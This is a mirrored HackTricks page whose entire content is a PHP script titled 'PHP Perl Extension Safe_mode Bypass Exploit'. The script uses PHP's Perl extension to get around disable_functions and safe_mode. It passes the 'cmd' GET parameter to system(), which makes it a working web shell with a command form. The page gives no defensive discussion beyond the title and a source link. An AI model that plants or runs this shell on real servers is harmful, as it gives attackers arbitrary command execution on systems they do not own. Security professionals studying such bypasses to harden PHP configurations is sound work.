mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
33 lines
1.2 KiB
Markdown
33 lines
1.2 KiB
Markdown
|
# disable\_functions bypass - PHP Perl Extension Safe\_mode Bypass Exploit
|
||
|
|
|
||
|
|
## PHP Perl Extension Safe\_mode Bypass Exploit
|
||
|
|
|
||
|
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
|
||
|
|
```php
|
||
|
|
<?php
|
||
|
|
|
||
|
|
##########################################################
|
||
|
|
###----------------------------------------------------###
|
||
|
|
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
|
||
|
|
###----------------------------------------------------###
|
||
|
|
###-Author:--NetJackal---------------------------------###
|
||
|
|
###-Email:---nima_501[at]yahoo[dot]com-----------------###
|
||
|
|
###-Website:-http://netjackal.by.ru--------------------###
|
||
|
|
###----------------------------------------------------###
|
||
|
|
##########################################################
|
||
|
|
|
||
|
|
if(!extension_loaded('perl'))die('perl extension is not loaded');
|
||
|
|
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
|
||
|
|
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
|
||
|
|
$perl=new perl();
|
||
|
|
echo "<textarea rows='25' cols='75'>";
|
||
|
|
$perl->eval("system('".$_GET['cmd']."')");
|
||
|
|
echo "</textarea>";
|
||
|
|
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
|
||
|
|
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"
|
||
|
|
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|